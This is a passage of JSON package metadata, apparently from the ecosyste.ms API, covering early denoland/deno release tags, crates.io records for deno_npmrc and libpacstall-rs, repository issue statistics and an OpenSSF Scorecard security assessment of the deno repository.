0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T04:55:28.089Z","dependent_packages_count":0,"downloads":48324,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":91.39639908485029,"dependent_repos_count":16.356966074853375,"dependent_packages_count":21.608082190690677,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":43.12048245013145},"purl":"pkg:cargo/deno_npmrc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npmrc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npmrc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npmrc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-04-26T11:44:01.831Z","updated_at":"2026-04-26T11:44:01.831Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-04-26T11:44:01.967Z","updated_at":"2026-04-26T11:44:01.967Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858434,"name":"libpacstall-rs","ecosystem":"cargo","description":"Backend API library for Pacstall","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","pacstall","apt","aur"],"namespace":null,"versions_count":1,"first_release_published_at":"2023-01-11T08:23:22.391Z","latest_release_published_at":"2023-01-11T08:23:22.391Z","latest_release_number":"2.0.0","last_synced_at":"2026-09-07T22:55:08.337Z","created_at":"2023-01-11T08:26:40.988Z","updated_at":"2026-09-07T22:55:08.338Z","registry_url":"https://crates.io/crates/libpacstall-rs/","install_command":"cargo install libpacstall-rs","documentation_url":"https://docs.rs/libpacstall-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party 